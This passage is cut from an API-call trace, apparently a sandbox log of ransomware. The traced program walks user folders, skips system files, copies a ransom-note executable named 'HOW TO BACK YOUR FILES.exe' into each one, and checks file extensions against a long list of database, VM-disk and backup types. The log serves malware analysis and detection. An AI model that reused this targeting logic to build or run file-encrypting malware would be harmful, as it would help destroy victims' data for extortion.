returned 16 [0065.454] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 74 [0065.454] lstrcpyW (in: lpString1=0x2cce46a, lpString2="Microsoft Feeds~" | out: lpString1="Microsoft Feeds~") returned="Microsoft Feeds~" [0065.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ca8 [0065.454] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x2c8f28 [0065.454] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7cb0 | out: ListHead=0x2e7710, ListEntry=0x2e7cb0) returned 0x2e7b90 [0065.454] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="aoldtz.exe") returned -1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2=".") returned 1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="..") returned 1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="windows") returned -1 [0065.454] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="bootmgr") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="temp") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="pagefile.sys") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="boot") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="ids.txt") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="ntuser.dat") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="perflogs") returned -1 [0065.455] lstrcmpiW (lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", lpString2="MSBuild") returned -1 [0065.455] lstrlenW (lpString="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 39 [0065.455] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\Microsoft Feeds~") returned 69 [0065.455] lstrcpyW (in: lpString1=0x2cce46a, lpString2="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0065.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xba) returned 0x318fc8 [0065.455] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0065.455] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", cAlternateFileName="{5588A~1")) returned 0 [0065.455] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.455] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.455] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x318fc8 | out: hHeap=0x2b0000) returned 1 [0065.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.455] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned 92 [0065.455] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.455] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.455] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.456] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.456] GetLastError () returned 0x0 [0065.456] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.456] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.456] CloseHandle (hObject=0x12c) returned 1 [0065.456] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.456] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.456] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.457] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.457] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.457] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.457] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.457] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.457] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.457] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac52b20, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.457] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.457] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="aoldtz.exe") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2=".") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="..") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="windows") returned -1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="bootmgr") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="temp") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="pagefile.sys") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="boot") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="ids.txt") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="ntuser.dat") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="perflogs") returned 1 [0065.457] lstrcmpiW (lpString1="WebSlices~", lpString2="MSBuild") returned 1 [0065.457] lstrlenW (lpString="WebSlices~") returned 10 [0065.457] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*") returned 94 [0065.457] lstrcpyW (in: lpString1=0x2cce4ba, lpString2="WebSlices~" | out: lpString1="WebSlices~") returned="WebSlices~" [0065.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c28 [0065.457] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xd0) returned 0x2d40a8 [0065.457] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c30 | out: ListHead=0x2e7710, ListEntry=0x2e7c30) returned 0x2e7cb0 [0065.457] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WebSlices~", cAlternateFileName="WEBSLI~1")) returned 0 [0065.457] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.457] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c30 [0065.457] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0065.457] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0065.458] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned 103 [0065.458] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.458] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.458] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.458] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.458] GetLastError () returned 0x0 [0065.458] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.458] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.458] CloseHandle (hObject=0x12c) returned 1 [0065.459] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.459] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.459] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.459] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.459] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.459] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.459] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac78c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.459] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.459] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.459] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.459] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.459] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac78c80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac78c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.459] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.459] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x668c5a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x668c5a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xff06fa11, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery~.feed-ms", cAlternateFileName="WEBSLI~1.FEE")) returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="aoldtz.exe") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="..") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="windows") returned -1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="bootmgr") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="temp") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="pagefile.sys") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="boot") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="ids.txt") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="ntuser.dat") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="perflogs") returned 1 [0065.459] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2="MSBuild") returned 1 [0065.459] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0065.459] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\*") returned 105 [0065.459] lstrcpyW (in: lpString1=0x2cce4d0, lpString2="Web Slice Gallery~.feed-ms" | out: lpString1="Web Slice Gallery~.feed-ms") returned="Web Slice Gallery~.feed-ms" [0065.460] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0065.460] lstrlenW (lpString="Ares865") returned 7 [0065.460] lstrcmpiW (lpString1="feed-ms", lpString2="Ares865") returned 1 [0065.460] lstrlenW (lpString=".dll") returned 4 [0065.460] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".dll") returned 1 [0065.460] lstrlenW (lpString=".lnk") returned 4 [0065.460] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".lnk") returned 1 [0065.460] lstrlenW (lpString=".ini") returned 4 [0065.460] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".ini") returned 1 [0065.460] lstrlenW (lpString=".sys") returned 4 [0065.460] lstrcmpiW (lpString1="Web Slice Gallery~.feed-ms", lpString2=".sys") returned 1 [0065.460] lstrlenW (lpString="Web Slice Gallery~.feed-ms") returned 26 [0065.460] lstrlenW (lpString="bak") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="bak") returned 1 [0065.460] lstrlenW (lpString="ba_") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="ba_") returned 1 [0065.460] lstrlenW (lpString="dbb") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="dbb") returned 1 [0065.460] lstrlenW (lpString="vmdk") returned 4 [0065.460] lstrcmpiW (lpString1="d-ms", lpString2="vmdk") returned -1 [0065.460] lstrlenW (lpString="rar") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="rar") returned -1 [0065.460] lstrlenW (lpString="zip") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="zip") returned -1 [0065.460] lstrlenW (lpString="tgz") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="tgz") returned -1 [0065.460] lstrlenW (lpString="vbox") returned 4 [0065.460] lstrcmpiW (lpString1="d-ms", lpString2="vbox") returned -1 [0065.460] lstrlenW (lpString="vdi") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="vdi") returned -1 [0065.460] lstrlenW (lpString="vhd") returned 3 [0065.460] lstrcmpiW (lpString1="-ms", lpString2="vhd") returned -1 [0065.460] lstrlenW (lpString="vhdx") returned 4 [0065.460] lstrcmpiW (lpString1="d-ms", lpString2="vhdx") returned -1 [0065.460] lstrlenW (lpString="avhd") returned 4 [0065.460] lstrcmpiW (lpString1="d-ms", lpString2="avhd") returned 1 [0065.460] lstrlenW (lpString="db") returned 2 [0065.460] lstrcmpiW (lpString1="ms", lpString2="db") returned 1 [0065.461] lstrlenW (lpString="db2") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="db2") returned 1 [0065.461] lstrlenW (lpString="db3") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="db3") returned 1 [0065.461] lstrlenW (lpString="dbf") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="dbf") returned 1 [0065.461] lstrlenW (lpString="mdf") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="mdf") returned 1 [0065.461] lstrlenW (lpString="mdb") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="mdb") returned 1 [0065.461] lstrlenW (lpString="sql") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="sql") returned -1 [0065.461] lstrlenW (lpString="sqlite") returned 6 [0065.461] lstrcmpiW (lpString1="eed-ms", lpString2="sqlite") returned -1 [0065.461] lstrlenW (lpString="sqlite3") returned 7 [0065.461] lstrcmpiW (lpString1="feed-ms", lpString2="sqlite3") returned -1 [0065.461] lstrlenW (lpString="sqlitedb") returned 8 [0065.461] lstrcmpiW (lpString1=".feed-ms", lpString2="sqlitedb") returned -1 [0065.461] lstrlenW (lpString="xml") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="xml") returned -1 [0065.461] lstrlenW (lpString="$er") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="$er") returned 1 [0065.461] lstrlenW (lpString="4dd") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="4dd") returned 1 [0065.461] lstrlenW (lpString="4dl") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="4dl") returned 1 [0065.461] lstrlenW (lpString="^^^") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="^^^") returned 1 [0065.461] lstrlenW (lpString="abs") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="abs") returned 1 [0065.461] lstrlenW (lpString="abx") returned 3 [0065.461] lstrcmpiW (lpString1="-ms", lpString2="abx") returned 1 [0065.461] lstrlenW (lpString="accdb") returned 5 [0065.461] lstrcmpiW (lpString1="ed-ms", lpString2="accdb") returned 1 [0065.461] lstrlenW (lpString="accdc") returned 5 [0065.461] lstrcmpiW (lpString1="ed-ms", lpString2="accdc") returned 1 [0065.461] lstrlenW (lpString="accde") returned 5 [0065.462] lstrcmpiW (lpString1="ed-ms", lpString2="accde") returned 1 [0065.462] lstrlenW (lpString="accdr") returned 5 [0065.462] lstrcmpiW (lpString1="ed-ms", lpString2="accdr") returned 1 [0065.462] lstrlenW (lpString="accdt") returned 5 [0065.462] lstrcmpiW (lpString1="ed-ms", lpString2="accdt") returned 1 [0065.462] lstrlenW (lpString="accdw") returned 5 [0065.462] lstrcmpiW (lpString1="ed-ms", lpString2="accdw") returned 1 [0065.462] lstrlenW (lpString="accft") returned 5 [0065.462] lstrcmpiW (lpString1="ed-ms", lpString2="accft") returned 1 [0065.462] lstrlenW (lpString="adb") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.462] lstrlenW (lpString="adb") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="adb") returned 1 [0065.462] lstrlenW (lpString="ade") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="ade") returned 1 [0065.462] lstrlenW (lpString="adf") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="adf") returned 1 [0065.462] lstrlenW (lpString="adn") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="adn") returned 1 [0065.462] lstrlenW (lpString="adp") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="adp") returned 1 [0065.462] lstrlenW (lpString="alf") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="alf") returned 1 [0065.462] lstrlenW (lpString="ask") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="ask") returned 1 [0065.462] lstrlenW (lpString="btr") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="btr") returned 1 [0065.462] lstrlenW (lpString="cat") returned 3 [0065.462] lstrcmpiW (lpString1="-ms", lpString2="cat") returned 1 [0065.462] lstrlenW (lpString="cdb") 